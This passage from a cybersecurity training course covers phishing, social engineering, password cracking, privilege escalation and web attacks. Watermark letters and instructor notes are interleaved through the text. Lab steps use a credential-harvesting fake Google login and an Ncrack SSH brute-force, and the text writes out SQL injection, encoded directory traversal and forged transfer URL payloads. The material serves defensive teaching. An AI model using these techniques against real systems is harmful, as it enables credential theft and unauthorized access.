• Quick Response (QR) codes can be sent through a variety of different messaging protocols.
They can be used as a delivery medium for phishing because QR codes often carry URL data. If
the URL the QR code links to is malicious, this can place the user's device at risk of infection
when they scan the code. QR code phishing by itself is not very convincing, and the user
probably won't go to the trouble of scanning an unsolicited code. However, in the proper
context, it can be effective. This is especially true when the QR code is made to look like a
e
coupon, or if accompanying text tells the user that scanning the code will help them save money
on a product they're interested in.
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
Figure 3-9: A phishing attempt using an e-card. The attacker has already gathered intelligence
on the recipient's name, birthday, and interests.
o
Phishing and Common Components

D
Just like the ways they're delivered, phishing attacks have a variety of different ways they can trick Phishing and Common
their targets. All these components can even be used in conjunction with one another to maximize Components
the effect.
• Spoofing messages are used to circumvent a major problem when phishing with various
delivery media. Even non-tech-savvy people will balk at messages they receive from unknown
sources. They might know someone named "John," but the "From:" field in the email header

says e34578dfh@mal-media.example—a pretty big red flag. However, email headers are easily
spoofed, and there are tools that automate the process. An attacker can easily use these so that,
when their victim loads their email software, they see the "From:" field as
john.henderson@develetech.com—the actual address of colleague John Henderson. Even
experienced users are often tricked by this because many inaccurately believe that the "From:"
field cannot be spoofed.
• Rogue domains are used in DNS hijacking attacks. Certain malware can alter the client's DNS
configuration and point their resolution services to a DNS server controlled by the attacker. So,
any URL the user enters into their browser could be redirected to a malicious site, even one
e
spoofed to look like the legitimate site. The phishing message can simply present a link to the
legitimate site—like www.google.com—and the user will be none the wiser. Attackers typically
ut
use rogue domains to trick people into typing their credentials into what they believe is the true
website.
ib
• Malicious links can be as simple as directly linking to a website controlled by the attacker, but
this isn't always effective. Much like a non-spoofed email, the user can see a URL named http://
le3.fy7.net/lx8h.aspx and immediately be skeptical. But it's simple to embed that URL into a
tr
much different display URL that's more enticing to the user. Because many users fail to verify the
actual link by hovering their mouse over the display URL, an attacker can have much more
is
success for almost no extra effort.
• Malicious attachments are perhaps less effective than they used to be. Most email clients
D
include some form of anti-malware scanning when users attempt to download an attachment.
Users are also more wary of downloading something from email than they are clicking a link
within the message body. Nevertheless, an attacker can have success if they make the file seem as
or
legitimate as possible to the user. This is often done in conjunction with spoofing—the message
appears to come from john.henderson@develetech.com, and the attachment is named Q2
sales.xlsx. If the file is able to avoid detection by the anti-malware, then this could be a strong
vector for a Trojan horse or other malicious software.
e
The spoofing website
at
used in this example is

https://emkei.cz.
lic
up
D
ot
N
o
Figure 3-10: Using a web-based tool to create a spoofed email (left) and receiving that spoofed
email (right).
D
Social Engineering for

Reconnaissance
Ask students if they can Social Engineering for Reconnaissance
think of any more
specific scenarios where
Attackers often use social engineering tactics to glean information from their targets to use in later
social engineering can attacks. Instead of implementing complex scanning and enumeration techniques, they often find it
be used for easier and more rewarding to simply trick the right people into revealing something about the target.
reconnaissance. Consider the following scenarios:

• A social engineer pretending to be an employee calls a human resources department. The social
engineer then politely asks the human resources personnel to provide them with names,
numbers, and emails of all employees in a particular department under the pretense of sending
them gifts. Instead, the social engineer has gathered key personnel information.
• A social engineer meets an employer in person for a job interview. As expected, the social
engineer asks the interviewer questions about the organization. The interviewer may think these
are innocent questions, but in reality, the social engineer is probing for any bit of information
about the organization they are able to get the interviewer to divulge. This can include
information about the company's network infrastructure, the storage protocols they use, the
e
environments that run on workstations and other hosts, and so on.
• A social engineer crafts a profile on social networking sites. Through this profile, the social
ut
engineer makes friend requests of the private social networking profiles of a company's
employees. The employees, thinking this profile belongs to a colleague or acquaintance, accept
ib
the request. On the employees' profiles are bits of information that people often use as part of
their passwords or as password verification questions. The social engineer is able to gather
intelligence on a large group of the company's personnel to use in an attack.
tr
• A social engineer tailgates into an entrance and then uses this opportunity to observe the
organization's physical security. How many guards are there? What areas do surveillance cameras
is
cover and where do they not? What other physical security controls are in place? The answers to
these questions can provide the attacker with valuable information about their target.
D
• A social engineer baits an employee by leaving a USB drive on the ground in the company
parking lot. The employee, curious about what's on the drive, picks it up and plugs it into their
workstation. Rather than executing any sort of overt malware, the social engineer has configured
or
this drive to automatically run port scanning and network enumeration software. The social
engineer now has a wealth of information about the company's network they can use to launch a
successful attack.
e
at
lic
up
D
ot
N
o
D

ACTIVITY 3-5
Assessing the Impact of Social Engineering
Before You Begin
e
Kali Linux is running. You'll be using the Social-Engineer Toolkit, a Python-based exploit
framework that can create a wide variety of automated social engineering attacks.
ut
Activity: Assessing the
Impact of Social Scenario
ib
Engineering
Several employees recently had some of their personal credentials stolen. These credentials were to
major sites like Google, Facebook, and LinkedIn. All of the victims claim that, in accordance with
tr
company security policy, they never directly gave their user names and passwords to anyone asking
for them. You therefore suspect they were tricked in a more subtle way—that the websites they
thought they were logging in to were in fact convincing forgeries.
is
In order to assess how effective pharming attacks are on your personnel, you'll see just how easy it is
to spoof the sign-in page of a major public website. For now, it was just the employees' personal
D
accounts that were compromised—but you don't want this to happen when they log in to an
internal website with their work credentials.
1. Open the Social-Engineer Toolkit.

a) In Kali Linux, open a terminal.
or
e
Remind students they b) At the prompt, enter sudo setoolkit
at
should enter kali if c) Enter y to accept the terms of service.

they are prompted to
enter a password after
2. Verify the available options and select one that will enable a pharming attack.
lic
running a sudo
command. a) Enter 1 to select Social-Engineering Attacks.
b) Enter 2 to select Website Attack Vectors.
up
c) Enter 3 to select Credential Harvester Attack Method.

This will create a fake login site and send any POST data back to you.
d) Enter 1 to select Web Templates.
D
Note: In this activity, you will use a fake Google sign-in page as the template.
You can also create your own fake site, or import one.
ot
3. Start the server that will host the fake web page.
a) At the prompt, enter 10.39.5.#, where # is your Kali Linux VM's IP address.
N
b) Enter 2 to select the Google template.

The Google template will spoof a Google login page and ask for a user name and password.
o
4. Simulate the victim falling prey to the pharming attack.

a) Minimize Kali Linux and switch to your Windows 10 client.
D
b) Open a web browser and navigate to 10.39.5.#, where # is your Kali Linux VM's IP address.
Consider pointing out In a real-world scenario, the attacker would use an embedded link, a shortened address, or a
that the spoofed site isn't compromised domain name to make the site more convincing to the victim.
perfect; for example, it
might be using an older
style of login page that
Google has since
changed.

c) Enter a fake user name and password combination into the sign-in fields, and then select the Sign in
button.
e
ut
ib
tr
is
D
or
e
at
lic
d) Close the browser.

up
5. Verify that your server captured the sign-in attempt.

a) Switch back to your Kali Linux VM.
D
ot
N
o
D

b) Verify that the terminal captured the user name and password you typed into the fake Google sign-in
page.
e
ut
ib
tr
is
D
or
e
at
What could make this attack more difficult for the attacker?
lic
6.
A: Answers may vary. Encouraging employees to use Google's two-factor authentication would help
mitigate this type of pharming attack. Also, implementing user policies that discourage clicking
unsolicited links could also help prevent the attack from succeeding.
up
7. What could make this attack more effective?

A: Answers may vary. An attacker may be able to fool the users more easily if the link itself is
D
believable, especially if they're spoofing a major website like Google. Likewise, they may choose
to spoof a less well-known site to catch the users off guard. This is especially effective if they've
convinced the users they need to enter their credentials for official reasons.
ot
8. What is the most significant weak spot that enables attacks like these to
succeed, and what can be done to fix the problem?
N
A: Answers may vary, but almost always, it's the human factor that is the weakest point in social
engineering attacks. Preventing these types of attacks from succeeding requires security
o
awareness training and fostering a cybersecurity culture within the organization.

D
9. Close any open windows in Kali Linux.

Summary
In this lesson, you analyzed the threat of attackers gathering intelligence on your network, systems,
and people. This intelligence can empower an attacker to launch a more devastating attack on your
organization. On the other hand, knowing what information you're exposing to attackers can
empower you to address glaring holes in your security.
What reconnaissance method is of most concern to you and your organization?
e
use the social
A: Answers will vary. Students in public-facing companies may be most wary of footprinting, as a good networking tools
ut
deal of operational information can be easily accessible via the Internet. Others may be concerned provided on the CHOICE
about attackers scanning their network for open ports to use as a vector for attack. Some students Course screen to follow
may be wary of having their entire network mapped with an enumerator, which could make it easier
ib
for an attacker to flood key devices that keep the network running optimally.
What sort of social engineering tactics have you or others you know
tr
continued learning.
experienced? How well are friends, family, and colleagues able to spot attempts
to manipulate them for information?
is
A: Answers will vary. Students are likely familiar with phishing, spam, and other communication-based
social engineering attacks. They may not have considered more physical social engineering, like
D
tailgating and dumpster diving. Students may know someone who was the victim of a social
engineering attack, indicating that some attacks are very convincing, the victims are undereducated
on the subject of cybersecurity, or both.
or
e
at
lic
up
D
ot
N
o
D
Lesson 3: Analyzing Reconnaissance Threats to Computing and Network Environments |

e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

4 Analyzing Attacks on
Computing and Network
e
ut
Environments
ib
tr
is
D
Lesson Introduction
or
You've analyzed the general risks and threats to your systems, and you've identified how
attackers can gather intelligence on these systems. Now you can begin to analyze the major
attacks themselves. There's a wide variety of ways malicious users can compromise your
e
operations, and it's vital you understand the potential effects of each one on the
organization.
at
Lesson Objectives
lic

up
• Assess the impact of system hacking attacks.

• Assess the impact of threats to web apps and services.
• Assess the impact of malware.
D
• Assess the impact of hijacking and impersonation attacks.

ot
• Assess the impact of denial of service incidents.

• Assess the impact of threats to mobile infrastructures.
N
• Assess the impact of threats to cloud infrastructures.

o
D

TOPIC A
Assess the Impact of System Hacking Attacks
In this topic, you'll consider how attackers can break into a system by finding or creating an
opening, and exploiting it.
e
System Hacking
ut
System Hacking (6 There are numerous tasks an attacker might perform when deciding to target a host such as a server
Slides) or workstation. In general, the approach will involve a combination of planning, knowledge, skills,
ib
Throughout this lesson, tools, and luck. While having an arsenal of good tools and methodologies will help the hacker, there
consider pointing to is not a single path to success. Every target is different, and the caretakers of a particular target may
specific Common have gone to great lengths to secure it from attack. So persistence, attention to detail, and an ability
tr
Vulnerabilities and to quickly identify and take advantage of opportunities are critical to the attacker's success.
Exposures (CVE), Unfortunately, an attacker needs only one open door (literally or figuratively) to gain access, and
is
Common Weakness
comprehensive security requires locking down thousands of potential access points.
Enumeration (CWE™),
and Common Attack
D
Pattern Enumeration
and Classification
(CAPEC™) entries that
demonstrate the real-
world impact of these
attacks and their related
vulnerabilities. Some
Figure 4-1: The system hacking process.
or
1. Start with a goal: The attacker might start with a specific goal in mind, such as defacing content
e
examples are provided on a particular web server or obtaining sensitive information that can be sold or held for ransom.
for you in content Or the attacker might have a very fuzzy goal—exploring to find vulnerabilities and deciding what
at
delivery tips. (if anything) to do about them once they are found.
2. Plan the attack: The attacker begins by formulating a plan of attack. Through personal
experience and information shared by others, an attacker would know common patterns for
lic
performing such an attack, and would likely possess various scripts and applications to automate
some of the busy work. In the case of an attack upon a web server, the attacker would consider
the attack surface, the various fronts on which such an attack could be launched:
up
• The operating system the server runs on, such as Windows® or Linux®.
• The server application itself (such as Apache or Internet Information Services [IIS]) provides
another front.
D
• Supporting systems and applications, such as databases, can be attacked (through SQL
injection, for example).
• Other servers co-located on the same host or local network.
ot
• Other applications on the host, such as Secure Shell (SSH) or Windows Remote Desktop, can
also provide a vector for attack.
N
3. Perform reconnaissance: Because the attacker doesn't know which front will be unprotected,
each one must be discovered and tested. Various sorts of reconnaissance might be useful in an
attack upon a web server, including:
o
• Footprinting, scanning, and enumeration of the server.

D
• Crawling the website to reveal structural information.

• Using Google to search for types of dynamic content used.
• Using public tools like Whois to search for registration information.
• Using social engineering tactics like dumpster diving to discover more useful information.
4. Identify potential vulnerabilities based on the information collected. For example, the attacker
might look up possible vulnerabilities for the software running on the host, such as those listed
in the National Vulnerability Database (NVD), Common Vulnerabilities and Exposures (CVE)
Lesson 4: Analyzing Attacks on Computing and Network Environments | Topic A

database, or Offensive Security's Exploit Database (https://www.exploit-db.com/about-

exploit-db/).
5. Exploit the vulnerabilities: For example, an attacker might:
• Start or stop services on the host.
• Disable or edit logs to hide the attack.
• Dig further into the site to gain more information about the site and its data.
• Load malware onto the site to infect other systems and users.
• Modify forms, databases, and other files to automatically forward sensitive data to other
e
collection points.
• Use the server as a launching point for attacks on other hosts.
ut
• Deface data on the site.
6. Conduct post-attack activities: To ensure they aren't detected or identified during or after an
ib
exploit, an attacker will attempt to eliminate all traces of their hack. This can help the attacker
evade any forensic processes the organization implements in the wake of a breach. Even if
attackers can't completely hide their attack, they may still be able to at least remove all evidence
tr
that points back to them as the culprit. Attackers will also attempt to persist in a target
environment as part of the post-attack phase; this will enable them to reuse access and continue
is
exploitation over a long period of time.
D
Password Sniffing
Password sniffing is an attack where the attacker monitors network transmissions for password Password Sniffing
or
data to extract that data for later use. Network users often transmit credential information both
within the private network and outside its boundaries, such as through the Internet. For example, a
network administrator's daily routine may involve opening a remote shell into various servers in the
organization to configure and maintain them. Every time the administrator attempts access to the
e
shell, they will likely need to transmit credentials to an authentication server. That transmission is
at
the target of a sniffing attack.

This is particularly a problem when these credentials are transmitted in plaintext. Users on public
Wi-Fi networks are at great risk of having their credentials stolen if they fail to use secure protocols
lic
such as Secure Sockets Layer/Transport Layer Security (SSL/TLS). If the attacker captures the
traffic, they can easily look for a user name and password within the packet. Transmissions that are
specifically encrypted, however, may halt a password sniffer's attempts unless the attacker is in
up
possession of the decryption key. In the previous example, the administrator is most likely using a
protocol such as Secure Shell (SSH) to establish an encrypted tunnel.
Organizational networks, especially larger ones, are usually segmented. This can prevent a sniffer
D
from ever seeing traffic that flows outside the segment where it is located. So, even if a transmission
is in plaintext or the attacker can decrypt it, they may not see that transmission in the first place.
Attackers can increase their chances of capturing passwords by placing the sniffer at key points in
ot
the network. For example, a sniffer installed on a proxy device may be able to see all traffic that is
externally bound and must first pass through the proxy.
N
o
D

e
ut
ib
Figure 4-2: Sniffing a password in Wireshark.
tr
Active vs. Passive Sniffing
Sniffing can be divided into two general types: active and passive. In active sniffing, the attacker
is
transmits packets directly to a target in the hopes of receiving a response that reveals password data.
In passive sniffing, the attacker positions the sniffer between nodes on a network and captures
D
packets sent and received by those nodes.
Password Cracking
Password Cracking
Example CVE IDs:
CVE-2009-4269 and
or
Password cracking is the recovery of secret passwords from data stored or transmitted by a
computer. Password crackers typically crack passwords in one of the following four methods:
e
• Brute-force password cracking uses random characters and numbers to crack a password. Brute-
CVE-2012-2742.
force password cracking is extremely resource intensive and can take a long time to be
at
Consider demonstrating successful, as password crackers generate every possible permutation for a given set of characters
the RainbowCrack
and numbers defined by a minimum and maximum length. This process can take anywhere from
website at project-
lic
rainbowcrack.com. seconds to thousands of years depending on the strength and complexity of the password being
Online vs. offline
cracked. It is therefore most effective on shorter passwords.
password cracking is • Dictionary password cracking uses a targeted technique of successively trying all the words in a
discussed later with pre-written, exhaustive list. This type of password cracking is typically faster than brute-force
up
penetration testing, but attacks, as it only tries possible passwords that are likely to be found or used. The main reason
you may wish to dictionary password cracking tends to be successful is because many people choose passwords
introduce the concepts that are short, single words found in standard dictionaries. These passwords can also be easily
here.
D
predicted variations, such as appending a digit or special character to a simple word. Note that
not all entries in a password dictionary are necessarily literal dictionary words.
• Hybrid password cracking uses a combination of both brute-force and dictionary password-
ot
cracking techniques. A hybrid password-cracking application will modify a word list or dictionary
by making common substitutions to letters, such as replacing the letter "a" with the "@" sign.
These tools also typically append characters and numbers to the end of dictionary words; for
N
example, the password "password" may be guessed as: p@ssword, p@ssw0rd, password1,
password01, pa$$word, and so on. This technique tends to be faster than standard brute-force
attacks, but slower than standard dictionary attacks.
o
• Rainbow tables are sets of pre-computed passwords and their hashes stored in a file. Using
D
rainbow tables dramatically reduces the time needed to crack a password. However, rainbow
tables work only on older hashing protocols with shorter outputs, such as Message Digest 5
(MD5) and Secure Hash Algorithm 1 (SHA-1). Newer protocols with 256 to 512+ bit outputs
have too many possibilities to fit into a single rainbow table. Adding a cryptographic salt to the
hashing process also mitigates the efficacy of rainbow tables, as the same password may have
two different hashes.

Consider informing
students that online
versus offline password
attacks will be discussed
in a later lesson.
e
ut
ib
tr
Figure 4-3: The results of a password crack.
is
Masked Attack
D
A masked attack is a type of brute-force cracking that goes about the process in a smarter way.
Because people often act predictably, especially when it comes to creating passwords, attackers can
shape their cracking attempt around these predictions. A password like Martin1945 exhibits several
or
traits common to passwords, including the starting character being uppercase, and the last four
characters being a year (typically the person's year of birth). Using these conventions, the attacker
can craft their attack with a mask, which is just a simple placeholder for all the values you'd expect
to find in a given character. The mask for the first character might be a placeholder for all 26 letters
e
of the English alphabet in uppercase. The mask for the last four characters might be any number
between 1910 and 2010. Successful masking can significantly reduce the time it takes to brute force
at
a password; in this case, what might have taken hours or days will end up taking only minutes.
Password Storage
lic
How passwords are stored greatly affects the time it takes to crack them. Passwords stored as
cryptographic hashes are much less likely to be cracked than passwords stored in plaintext, which
up
can be trivial to crack. Not all cryptographic hashes are equal, however. The success of a cracking
attempt may depend on the standards the target organization has in place. Incorporating obsolete or
insecure hashing algorithms like MD5 will pose less of a challenge to an attacker than a strong
algorithm like SHA-512.
D
Privilege Escalation
ot
Once an exploit has been launched, one of the first objectives of an attack is typically to provide the Privilege Escalation
attacker with extensive access to the exploited system. This process is called privilege escalation. Example CVE IDs:
N
With privilege escalation, the user is able to obtain access to additional resources or functionality CVE-2016-0197,
that they are normally not allowed access to. One of the most common scenarios is when a normal CVE-2016-0180, and
user is able to exploit some vulnerability in a system to gain administrator or root-level privileges. CVE-2016-0161.
o
There are actually two distinct types of privilege escalation: vertical and horizontal.
Vertical privilege escalation, also called privilege elevation, occurs when a user can perform
D
functions that are not normally assigned to their role or explicitly permitted. A lower-privilege
application or user gains access to content or functions that are reserved for a higher-privilege-level
user, such as root or an administrator.
Horizontal privilege escalation occurs when a user accesses or modifies specific resources they
are not entitled to. For example, an attacker may be able to manipulate input parameters in a
vulnerable application to obtain other app users' private data.

e
ut
ib
tr
is
D
or
e
Figure 4-4: Comparing vertical and horizontal privilege escalation.
at
Social Engineering for Systems Hacking

lic
Social Engineering for One of the most powerful system hacking tools a hacker has in their arsenal is a non-technical one:
Systems Hacking social engineering. As you've seen, a social engineer can glean quite a bit of reconnaissance
information through trickery and deception. This can directly translate into a much more successful
up
and devastating system hack. Take, for example, an attacker who is able to trick an employee into
revealing access credentials to a customer database. The attacker pretends to be the IT help desk and
requests that the employee provide their user name and password so the attacker can verify their
security. The employee trusts the attacker's assumed authority and falls for this ploy.
D
Now, consider the alternative: the attacker would need to launch a series of complicated and
technical attacks to either brute force the password or somehow exploit a flaw in the database's
authentication systems. Neither of these possibilities is guaranteed to work, much less be achieved
ot
quickly and easily. Yet, through a simple confidence trick, the attacker got everything they needed to
infiltrate the database with minimal effort.
N
This is why hackers who employ social engineering at the onset are often so successful: the human
being is the weakest link in any system. Your technical controls are not strong enough to combat the
consequences of a poor or non-existent security culture in your organization.
o
D
System Hacking Tools and Exploitation Frameworks

System Hacking Tools The following are examples of popular tools and frameworks attackers may use to hack systems.
and Exploitation Password sniffers
Frameworks
• Wireshark
• Cain & Abel
• tcpdump

• Kismet
• Ettercap
• Nagios Network Analyzer
Password crackers
• John the Ripper
• Cain & Abel
• THC Hydra
• pwdump
e
• Ophcrack
ut
• Medusa
• Ncrack
ib
Exploitation frameworks
• Metasploit Framework
• Core Impact
tr
• CANVAS
is
• w3af
• BeEF
D
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 4-1
Assessing the Impact of System Hacking
Attacks
e
Data File
ut
/home/kali/Desktop/top1000pass.txt
ib
Impact of System Before You Begin
Hacking Attacks
You'll be using your Kali Linux™ VM and Ncrack to crack your Windows Server® Administrator
password. Ncrack will perform an online password attack against the running SSH server, which has
tr
already been set up for you. The SSH server being used is OpenSSH. The dictionary list you'll be
using to crack the server is a text file of the top 1,000 commonly used passwords.
is
Scenario
D
Looking at reconnaissance attacks has led you to think about the next steps for the attackers going
after the Develetech network. The company has been lax in password policy before, and you decide
to see if an attacker could get easy access to your critical servers by cracking passwords. You'll
or
therefore perform an online password cracking attempt against your SSH server using a pre-
generated password dictionary. If you manage to breach the server, you'll see just how much damage
you can do with a successful hacking attack.
e
at
1. Start Ncrack, a password cracker.

a) In Kali Linux, open a terminal.
lic
b) Enter ncrack
c) Review the syntax for running the command, as well as the various options.
Note: Since you will be attacking a single target using a pre-generated

up
dictionary of passwords, you will be using the -P flag to point Ncrack to the
dictionary file.
Consider asking
D
students why they would 2. Use Ncrack to crack the server's Administrator password through SSH.
use the cd option. The
a) At the prompt, enter the following:
answer: to get around
ot
systems that lock logins ncrack -p 22 --user Administrator -P /home/kali/Desktop/top1000pass.txt

after a certain number of 10.39.5.#
attempts in a short time.
N
Note: Be sure to replace the IP address with your Windows Server's.

o
If they'd rather not type

the full path, students
D
can also drag the file

from the desktop to the
terminal to populate the
path, or press Tab to
complete the path as
they type it.

b) Verify that Ncrack begins the password cracking process.
e
While Ncrack is running
Note: The cracking process will take less than a minute. the cracking attempt,
ut
have students go to
steps 3 and 4.
ib
3. While Ncrack runs the cracking process, open top1000pass.txt from the
desktop.
tr
4. Do you know anyone who uses one of these passwords?
is
A: Answers will vary, but most people know at least one person who uses common, insecure
passwords like these.
D
5. Log in to the SSH server using the credentials you just cracked.
a) When the password crack finishes, verify that Ncrack has identified the Administrator password—
Pa22w0rd.
Note: If no password appears, rerun the command.or

e
at
lic
up
D
b) At the terminal, enter ssh Administrator@10.39.5.#

ot
c) Enter yes to accept the message about the server's authenticity.

d) At the password prompt, enter Pa22w0rd
N
Caution: Be careful when inputting the password, as the characters will not
appear for you to check.
o
e) Verify that you have a shell into the Windows Server.

D

6. Exploit your Windows Server with your newly gained privileges.

a) At the shell, enter whoami
Note: Because you are using SSH to connect to the server, you will be issuing
Windows commands.
b) Verify that you're develetech\administrator.
c) Enter whoami /priv
This will show you all of your privileges. Note that creating and deleting objects are among these.
d) Enter cd Desktop
e
e) Enter dir to list the files on the server's desktop.
ut
f) Enter echo You have been PWNed! > Gotcha.txt
g) Enter dir again and verify your Gotcha.txt file is listed.
h) Switch to your Windows Server 2019 computer, log in, and open the Gotcha.txt file on the desktop.
ib
Confirm your message is there, and then close the file.
tr
7. What other harm could the attacker do with this access?
A: Answers will vary, but the options are almost limitless—they could delete files, install programs,
is
and download malware for just a few examples.
How would you defend against this type of attack?
D
8.
A: Answers may vary, but the most pressing issue is to enforce a stronger password policy that
rejects such a common and simple password, especially for the administrator. You can also limit
9.
or
the number of password attempts or disable SSH connections entirely.
In Kali Linux, press Ctrl+C to close your SSH connection.

e
You may wish to inform
students that they will
at
use this SSH access in

later activities.
lic
up
D
ot
N
o
D

TOPIC B
Assess the Impact of Web-Based Attacks
Attacks that target web-based infrastructures, like browsers and web servers, are some of the most
common cyber attacks today. In this topic, you'll assess the significant impact these types of attacks
can have.
e
ut
Client-Side vs. Server-Side Attacks
Attacks launched on web-based resources are categorized as either client- or server-side exploits. Client-Side vs. Server-
ib
Client-side attacks target the user who is attempting to access resources from a server, usually Side Attacks
through the client's browser. Client-side exploits typically depend on social engineering, relying on
tr
users to inadvertently compromise their system or connection. For example, a client-side exploit
might convince the user to select a link or button to perform a seemingly innocent task. In a web
is
page, this might launch a JavaScript function that executes malicious code on the user's browser,
causing the browser to crash.
D
Server-side exploits specifically target the computers that host web-based content. Although they
can manifest themselves on the client end, the issue is localized on the server. Certain attacks can
enable an attacker to execute malicious scripts on the server, and any further content it serves to
or
other clients can be compromised. For example, an attacker may be able to inject malicious code
into a web application, affecting anyone who loads the web app from the server.
Cross-Site Scripting (XSS)

e
at
In a cross-site scripting (XSS) attack, an attacker takes advantage of scripting and input Cross-Site Scripting
validation vulnerabilities in web apps to attack legitimate users in three different ways: (XSS)
• In a stored attack, the attacker injects malicious code or links into a website's forums, databases, Example CWE IDs:
lic
CWE-79, CWE-87, and

or other data. When a user views the stored malicious code or clicks a malicious link on the site,
CWE-692.
an attack is perpetrated against the user.
Example CAPEC IDs:
• In a reflected attack, the attacker crafts a form or other request to be sent to a legitimate web
up
CAPEC-86,
server. This request includes the attacker's malicious script. The attacker sends a link to the CAPEC-106, and
victim with this request, and when the victim clicks this link, the malicious script is sent to the CAPEC-243.
legitimate server and reflected off it. The script then executes on the victim's browser.
D
• In a Document Object Model (DOM)-based attack, malicious scripts are not sent to the
server at all; rather, they take advantage of a web app's client-side implementation of JavaScript
to execute their attack solely on the client.
ot
Cross-Site Request Forgery (XSRF)

N
In a cross-site request forgery (XSRF)/(CSRF) attack, an attacker takes advantage of the trust Cross-Site Request
established between an authorized user of a website and the website itself. This type of attack Forgery (XSS) (2 Slides)
o
exploits a web browser's trust in a user's unexpired browser cookies. Websites that are at the most Example CWE ID:
risk are those that perform functions based on input from trusted authenticated users who CWE-352.
D
authenticate automatically using a saved browser cookie stored on their machines. The attacker takes Example CAPEC IDs:
advantage of the saved authentication data stored inside the cookie to gain access to a web browser's CAPEC-62,
sensitive data. CAPEC-462, and
CAPEC-467.
This functionality is found on most web pages and is enabled when a user logs in to access account
information. If, when logging in, the user selects the Remember Me option, then a cookie is saved
and accessed the next time they visit that web page. For example:
1. A victim logs in to their banking website, bank.example, choosing the Remember Me option.
Lesson 4: Analyzing Attacks on Computing and Network Environments | Topic B

2. bank.example stores the victim's authentication data inside a cookie.

3. An attacker sends the victim an email message with a link inside it. The link is disguised as
something innocuous, but it really points to: https://www.bank.example/transfer?
from_acct=victim&to_acct=attacker&amount=1000.
4. Later, the victim, who has left the bank.example website, checks this email message and selects
the link.
5. bank.example trusts the user and fulfills the request in this link.
6. The site transfers money to the attacker.
e
ut
ib
tr
is
D
or
Figure 4-5: An example of an XSRF attack.
e
XSRF attacks are extremely difficult to detect and perform forensics on, since the attack is carried
at
out by the user's browser just as it normally would be if the user themselves made the request. It is
almost impossible to distinguish a successful XSRF attack from normal user activity.
lic
Command Injection
up
SQL Injection Command injection, also called code injection, is an attack that introduces malicious code into a
Example CAPEC IDs: vulnerable application to compromise the security of that application. An attacker who injects
CAPEC-7, CAPEC-88, malicious code into a web app or web page can cause a denial of service incident, retrieve
and CAPEC-248. information they are unauthorized to view, install malware, or escalate privileges on the server. One
D
Consider demonstrating of the most popular types of command injections is SQL injection.
www.altoromutual.com.
Almost every web application employs a database backend to store whatever kind of information it
This is a fake banking
ot
website that can be used needs to operate. To gain access to the information stored within the database, the application may
to test command use Structured Query Language (SQL) to communicate. SQL is the most common language that
injection, among other applications use to interact with a database to perform four basic functions. These functions are:
N
web-based threats. selecting data from the database, inserting data into the database, deleting data from the database,
There are several videos and updating data within the database. In an SQL injection attack, an attacker can modify one or
on YouTube that more of these four basic functions by embedding code in some input within the web app, causing it
o
demonstrate how to to execute the attacker's own set of queries using SQL.
"attack" the site.
D
To identify SQL injection vulnerabilities in a web app, an attacker must test every single input to
include elements such as URL parameters, form fields, cookies, POST data, and HTTP headers. The
simplest and most common method for identifying possible SQL injection vulnerabilities in a web
app is to submit a single apostrophe and then look for errors. If an error is returned, the attacker
will look to see if it provides them with SQL syntax details that can then be used to construct a
more effective SQL injection query. If the single apostrophe returned an error message, the attacker
may also try submitting two apostrophes, and if no error is returned, then the input being tested is
most likely vulnerable to SQL injection. Attackers may also carry out injections by using the SQL

wildcard character (%) to look for a large amount of data sets, or they may submit a mathematical
expression equivalent to the expected value to expose some vulnerability within the app.
e
ut
ib
tr
is
D
or
e
at
Figure 4-6: A simple SQL injection statement dumping an entire list of products. This happens
lic
because 1=1 is always true.
Example
up
An organization's public-facing web app uses simple HTML forms and Cascading Style Sheets (CSS)
to ask for a user name and password to access the app. This web app accesses an SQL database of
credentials to validate the user name and password input. If you have a user, John, with a password
of !Pass1234, then the following is what a typical SQL query would look like:
D
SELECT * FROM tbl_user WHERE username = 'John' AND password '!Pass1234'

This SQL query would return all instances within the database where the user name John and the
ot
password !Pass1234 were found.

An attacker begins the injection by inserting a single apostrophe into the user name form field, and
the !Pass1234 password discovered beforehand. This results in the following SQL query:
N
SELECT * FROM tbl_user WHERE username = ''' AND password '!Pass1234'

Notice there is now an odd number of apostrophe characters, which would result in an error being
o
returned by the database server. The attacker now knows they need to complete the SQL statement
with a syntactically correct query. To do this, the attacker uses a value that is always true, such as
D
1=1, and then uses the built-in capability to insert inline comments within the query by inputting the
-- characters. The -- characters are used within the SQL language to denote comments, and the
SQL database query engine will ignore anything following them. This is what the SQL injection
exploit string ' or 1=1-- would look like when the attacker inserts it into the user name form field:
SELECT * FROM tbl_user WHERE username = '' or 1=1--' AND password '!Pass1234'

The SQL syntax is now correct, and the database will not return an error if this SQL statement were
sent to it. Instead, the database will return every single one of its lines, since the 1=1 statement is
always true.
Parameterized Queries
Most secure websites with an SQL backend will incorporate a technique called parameterized
queries to defend against SQL and other code injection attacks. A query is parameterized when it
incorporates placeholders for some of its parameters. Later, when the query is executed, the web
app binds the actual values to these parameters in a different statement. So, a quotation mark in a
e
parameterized query would be interpreted literally, rather than interpreted as if it were a part of the
ut
query structure. Parameterized queries are also called prepared statements.
Directory Traversal
ib
Directory Traversal Directory traversal is the practice of accessing a file from a location that the user is not authorized
tr
Example CAPEC IDs: to access. The attacker does this by ordering an application to backtrack through the directory path
CAPEC-126 and so the application reads or executes a file in a parent directory. The most simple example of
CAPEC-213. directory traversal involves sending a ../ command request to the application or application
is
programming interface (API), which then traverses up one parent directory for each one of these
commands. This command is applicable to both Unix-like and Windows systems, but Windows
D
systems also accept ..\ as the traversal command.
Directory traversal causes the most damage when attackers are able to traverse all the way back to
the root to execute basically any command or program in any folder on the computer. However, this
or
will only work if the application has been given the privileges to access such folders. Likewise, many
web apps will detect query strings containing traversal characters. So, assume an attacker tries to
open a command prompt on the server hosting the web app. If the attacker sends a GET request to
e
the server with multiple traversal commands (../../Windows/system32/cmd.exe), then the
application may block the request.
at
Still, if the attacker encodes the traversal command in a URL encoding scheme, then they may be
able to bypass this security mechanism. For instance, %2E is equivalent to . (period) and %2F is
lic
equivalent to / (slash). The GET request reformatted as %2E%2E%2F%2E%2E%2FWindows/

system32/cmd.exe may get around software that does not enforce adequate filtering. Once the
attacker successfully traverses the file structure of the server hosting the web app, they can launch
up
any number of attacks that can harm both the server itself and its connecting clients.
File Inclusion
D
File Inclusion In a file inclusion attack, the attacker adds a file to the running process of a web app or website.
Example CAPEC IDs: The file is either constructed to be malicious or manipulated to serve the attacker's malicious
